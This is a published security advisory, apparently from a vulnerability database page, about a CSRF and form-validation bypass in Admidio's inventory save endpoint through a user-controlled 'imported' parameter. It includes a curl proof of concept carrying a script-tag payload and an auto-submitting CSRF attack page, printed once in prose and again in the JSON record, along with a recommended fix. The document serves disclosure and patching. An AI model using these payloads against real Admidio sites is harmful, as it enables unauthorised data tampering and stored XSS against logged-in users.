GHSA-4RWM-C5MJ-WH7X

Vulnerability from github – Published: 2026-03-31 23:11 – Updated: 2026-03-31 23:11
VLAI?
Summary
Admidio has CSRF and Form Validation Bypass in Inventory Item Save via `imported` Parameter
Details

Summary

The inventory module's item_save endpoint accepts a user-controllable POST parameter imported that, when set to true, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the FormPresenter validation normally enforces.

Details

In modules/inventory.php, the imported parameter is read from POST input:

File: modules/inventory.php:50

$postImported = admFuncVariableIsValid($_POST, 'imported', 'bool', array('defaultValue' => false));

This is then passed to ItemService:

File: modules/inventory.php:251-256

$itemService = new ItemService($gDb, $itemUuid, $postCopyField, $postCopyNumber, $postImported);
$itemService->save(true);

Inside ItemService::save(), the postImported flag completely skips CSRF and form validation:

File: src/Inventory/Service/ItemService.php:99-109

public function save(bool $multiEdit = false): void
{
    global $gCurrentSession, $gL10n, $gSettingsManager;

    // check form field input and sanitized it from malicious content
    if (!$this->postImported) {
        $itemFieldsEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);
        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);
    } else {
        $formValues = $_POST;   // Raw $_POST used with no CSRF check, no validation
    }
    // ... item data is saved using raw $formValues

When imported=1 is sent, the code: 1. Skips $gCurrentSession->getFormObject() — which validates the CSRF token 2. Skips $itemFieldsEditForm->validate() — which sanitizes and validates field values 3. Uses raw $_POST values directly to save to the database

This means: - CSRF protection is completely bypassed — an external website can trick a logged-in user into modifying inventory data - Form validation is bypassed — field type checks, required field checks, and input sanitization are all skipped - Raw user input flows into $this->itemRessource->setValue() and then saveItemData() without the normal server-side sanitization

PoC

# As an authenticated user with inventory access, save arbitrary item data
# without a valid CSRF token and without form validation:

curl -X POST -b 'ADMIDIO_SESSION=<session>' \
  'https://admidio.local/modules/inventory.php?mode=item_save' \
  -d 'imported=1' \
  -d 'adm_csrf_token=anything' \
  -d 'INF-CATEGORY=1' \
  -d 'INF-ITEMNAME=<script>alert(1)</script>'

# The CSRF token is not checked because imported=true skips the form object lookup.
# The field value is not sanitized because validate() is skipped.

A CSRF attack page would look like:

<html>
<body>
<form action="https://admidio.local/modules/inventory.php?mode=item_save" method="POST">
  <input type="hidden" name="imported" value="1" />
  <input type="hidden" name="adm_csrf_token" value="dummy" />
  <input type="hidden" name="INF-CATEGORY" value="1" />
  <input type="hidden" name="INF-ITEMNAME" value="Attacker-controlled data" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

Impact

  • CSRF bypass: An attacker can trick any logged-in inventory user into creating or modifying inventory items by having them visit a malicious page.
  • Validation bypass: Server-side field type validation, required field checks, and input sanitization are all skipped, allowing arbitrary data to be stored.
  • Stored XSS potential: Because validate() is bypassed, unsanitized input may be stored and later rendered to other users (dependent on output encoding in the view layer).

Recommended Fix

Remove the imported parameter bypass from the save logic, or at minimum always validate the CSRF token regardless of the imported flag:

public function save(bool $multiEdit = false): void
{
    global $gCurrentSession, $gL10n, $gSettingsManager;

    // ALWAYS validate CSRF token
    $itemFieldsEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);

    if (!$this->postImported) {
        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);
    } else {
        // For imported items, still validate the CSRF token (done above)
        // and apply basic sanitization
        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);
    }
    // ...
}

Alternatively, the imported flag should only be set by the import workflow itself (via a session variable set during the import process), rather than being controllable via direct POST input.

Severity ?
4.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.7"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "admidio/admidio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34383"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-31T23:11:48Z",
    "nvd_published_at": "2026-03-31T21:16:30Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe inventory module\u0027s `item_save` endpoint accepts a user-controllable POST parameter `imported` that, when set to `true`, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the `FormPresenter` validation normally enforces.\n\n## Details\n\nIn `modules/inventory.php`, the `imported` parameter is read from POST input:\n\n**File:** `modules/inventory.php:50`\n```php\n$postImported = admFuncVariableIsValid($_POST, \u0027imported\u0027, \u0027bool\u0027, array(\u0027defaultValue\u0027 =\u003e false));\n```\n\nThis is then passed to `ItemService`:\n\n**File:** `modules/inventory.php:251-256`\n```php\n$itemService = new ItemService($gDb, $itemUuid, $postCopyField, $postCopyNumber, $postImported);\n$itemService-\u003esave(true);\n```\n\nInside `ItemService::save()`, the `postImported` flag completely skips CSRF and form validation:\n\n**File:** `src/Inventory/Service/ItemService.php:99-109`\n```php\npublic function save(bool $multiEdit = false): void\n{\n    global $gCurrentSession, $gL10n, $gSettingsManager;\n\n    // check form field input and sanitized it from malicious content\n    if (!$this-\u003epostImported) {\n        $itemFieldsEditForm = $gCurrentSession-\u003egetFormObject($_POST[\u0027adm_csrf_token\u0027]);\n        $formValues = $itemFieldsEditForm-\u003evalidate($_POST, $multiEdit);\n    } else {\n        $formValues = $_POST;   // Raw $_POST used with no CSRF check, no validation\n    }\n    // ... item data is saved using raw $formValues\n```\n\nWhen `imported=1` is sent, the code:\n1. Skips `$gCurrentSession-\u003egetFormObject()` \u2014 which validates the CSRF token\n2. Skips `$itemFieldsEditForm-\u003evalidate()` \u2014 which sanitizes and validates field values\n3. Uses raw `$_POST` values directly to save to the database\n\nThis means:\n- CSRF protection is completely bypassed \u2014 an external website can trick a logged-in user into modifying inventory data\n- Form validation is bypassed \u2014 field type checks, required field checks, and input sanitization are all skipped\n- Raw user input flows into `$this-\u003eitemRessource-\u003esetValue()` and then `saveItemData()` without the normal server-side sanitization\n\n## PoC\n\n```bash\n# As an authenticated user with inventory access, save arbitrary item data\n# without a valid CSRF token and without form validation:\n\ncurl -X POST -b \u0027ADMIDIO_SESSION=\u003csession\u003e\u0027 \\\n  \u0027https://admidio.local/modules/inventory.php?mode=item_save\u0027 \\\n  -d \u0027imported=1\u0027 \\\n  -d \u0027adm_csrf_token=anything\u0027 \\\n  -d \u0027INF-CATEGORY=1\u0027 \\\n  -d \u0027INF-ITEMNAME=\u003cscript\u003ealert(1)\u003c/script\u003e\u0027\n\n# The CSRF token is not checked because imported=true skips the form object lookup.\n# The field value is not sanitized because validate() is skipped.\n```\n\nA CSRF attack page would look like:\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cform action=\"https://admidio.local/modules/inventory.php?mode=item_save\" method=\"POST\"\u003e\n  \u003cinput type=\"hidden\" name=\"imported\" value=\"1\" /\u003e\n  \u003cinput type=\"hidden\" name=\"adm_csrf_token\" value=\"dummy\" /\u003e\n  \u003cinput type=\"hidden\" name=\"INF-CATEGORY\" value=\"1\" /\u003e\n  \u003cinput type=\"hidden\" name=\"INF-ITEMNAME\" value=\"Attacker-controlled data\" /\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.forms[0].submit();\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n## Impact\n\n- **CSRF bypass**: An attacker can trick any logged-in inventory user into creating or modifying inventory items by having them visit a malicious page.\n- **Validation bypass**: Server-side field type validation, required field checks, and input sanitization are all skipped, allowing arbitrary data to be stored.\n- **Stored XSS potential**: Because `validate()` is bypassed, unsanitized input may be stored and later rendered to other users (dependent on output encoding in the view layer).\n\n## Recommended Fix\n\nRemove the `imported` parameter bypass from the save logic, or at minimum always validate the CSRF token regardless of the `imported` flag:\n\n```php\npublic function save(bool $multiEdit = false): void\n{\n    global $gCurrentSession, $gL10n, $gSettingsManager;\n\n    // ALWAYS validate CSRF token\n    $itemFieldsEditForm = $gCurrentSession-\u003egetFormObject($_POST[\u0027adm_csrf_token\u0027]);\n\n    if (!$this-\u003epostImported) {\n        $formValues = $itemFieldsEditForm-\u003evalidate($_POST, $multiEdit);\n    } else {\n        // For imported items, still validate the CSRF token (done above)\n        // and apply basic sanitization\n        $formValues = $itemFieldsEditForm-\u003evalidate($_POST, $multiEdit);\n    }\n    // ...\n}\n```\n\nAlternatively, the `imported` flag should only be set by the import workflow itself (via a session variable set during the import process), rather than being controllable via direct POST input.",
  "id": "GHSA-4rwm-c5mj-wh7x",
  "modified": "2026-03-31T23:11:48Z",
  "published": "2026-03-31T23:11:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-4rwm-c5mj-wh7x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34383"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/commit/00494b95dfe847af8b938e4397e5d909d8f36839"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Admidio/admidio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Admidio has CSRF and Form Validation Bypass in Inventory Item Save via `imported` Parameter"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.